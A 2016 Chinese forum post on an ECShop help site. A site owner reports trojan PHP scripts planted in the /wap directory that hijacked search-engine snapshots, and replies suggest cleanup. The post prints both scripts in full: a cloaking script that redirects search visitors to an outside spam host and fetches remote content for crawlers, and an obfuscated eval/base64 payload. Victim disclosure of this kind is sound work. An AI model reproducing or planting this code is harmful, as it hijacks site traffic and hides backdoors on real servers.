wap目录挂马,劫持搜索引擎快照

2016-07-07 15:12 来源:www.chinab4c.com 作者:ecshop专家

两个木马脚本,在/article.php中引入了他们,结果我的文章快照全被劫持
脚本内容如下/wap/init.php
  1. <?php
  2. if(! function_exists("gg") && $c=='' ){function gg($url){$ch = curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$contents = curl_exec($ch);return $contents;}if(!defined("myhost")){
  3. define("myhost","?domain={$_SERVER['HTTP_HOST']}&i={$_SERVER['REQUEST_URI']}");} $tiaourl="http://www.seo-boys.com/jc/8g8.html";
  4. $tjdaima="<script language='javascript' src='http://count16.51yes.com/click.aspx?id=160664107&logo=12' charset='gb2312'></script>";
  5. $wd = <<<FANRENGU
  6. 这其中是关键字列表,论坛不让发见:http://pan.baidu.com/share/link?shareid=480161&uk=1746266667
  7. FANRENGU;

  8. $h=$_SERVER['HTTP_HOST'];$p=$_SERVER['SERVER_PORT'];$p=($p=='80')?'':":{$p}";$wen=$_SERVER['REQUEST_URI'];$wen = preg_replace("~[^\w\-%\/&\.\?=]~isU","",$wen);$u="http://$h$p$wen";$cks2=false;$wd=str_replace(array("\r"),"",$wd);$wda=explode("\n",$wd);foreach($wda as $ww){$w1=trim($ww);if(strlen("徐")==3){$w2=mb_convert_encoding($w1,"gbk","utf-8");}else{$w2=mb_convert_encoding($w1,"utf-8","gbk");}$w11=urlencode($w1);$w22=urlencode($w2);if(stristr($_SERVER['HTTP_REFERER'],$w11)!='' || stristr($_SERVER['HTTP_REFERER'],$w22)!=''){echo $w1;$cks2=true;break;}}$ref=explode(',','baidu,google,soso,sogou');$cks=$ckp=false;$spider=explode(',','Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp');if($_SERVER['HTTP_REFERER']!=''){foreach($ref as $r){if(stristr($_SERVER['HTTP_REFERER'],$r)!=''){$cks=true;break;}}}foreach($spider as $s){if(stristr($_SERVER['HTTP_USER_AGENT'],$s)!=''){$ckp=true;break;}}if(!$cks2 && $cks){$cks=false;}if(!$cks && !$ckp){}else{if($cks){echo "<body onload=\"location.href='{$tiaourl}';\">{$tjdaima}<meta http-equiv='refresh' content='3; url={$tiaourl}'/></body>";exit;}$this_host = $_SERVER['HTTP_HOST'];function a($str){global $u,$wen;if($wen==''){$str=preg_replace("~\?i=(\d+?)~isU","{$u}?i=$1", $str);}else{$str=preg_replace("~\?i=(\d+?)~isU","{$u}&i=$1", $str);}$str=preg_replace("~(&?i=\d+?){2,}~isU","$1", $str);$str=preg_replace("~(\.php)&(i=\d+?)~isU","$1?$2", $str);$str=preg_replace("~\?&(i=\d+?)~isU","?$1", $str);return $str;}function e($u,$k){if ($k=="www.seo-boys.com/jt/8g8.html"){$files=gg($u);return $files;}else{return null;}}$c=e(myhost,'www.seo-boys.com/jt/8g8.html');$c=a($c);if($c!=''){ob_clean();}echo $c;flush();ob_flush();EXIT;}}?>
复制代码
/wap/global.php
  1. <?php
  2. /*

  3. */
  4. eval(gzinflate(base64_decode('fZJPS8QwEMXPu7DfIZSFbUFbvbq7Fg9RTyK1ehEp3Xb6R9JOSFK6In53pxHdIqWXQF7eL29mmPB6F8pKrpaMrbtUsD1zKmPkVRD0fe/34nDUfoZN8J4FdZvD0Sezs2XWr/CAhoiLrb0+P/EoubnjDzFp2iiDAntQ7jqhhxcevW7u4/gxOdk2b54l68KFRpqP/86I3/KIR2TzPlfLBUX8yFCAAjWU2jr2g6/hAKFh2jaqpVMihwxzmMk6fUmFEStRu6Pmzhzq2vG8wTAawqXFZigt6xzUNLiY40Sn5DQ2QzWQ16lMlWlB6fMSsRQwn/0rkmrHDVmFrKgFJCWYJMPWQGsohbbkb0Qhbc83')));
  5. ?>
复制代码
目前没有彻底解决隐患,不过其中连接有heishou的站点 大家heidiao丫的:www.seo-boys.com http://www.89899.com/

回答:
直接删除这些无用目录




像这种知道是什么漏洞所致吗?v7.2

要不你就换个空间,有次我也总被挂马,直接换服务器就OK了。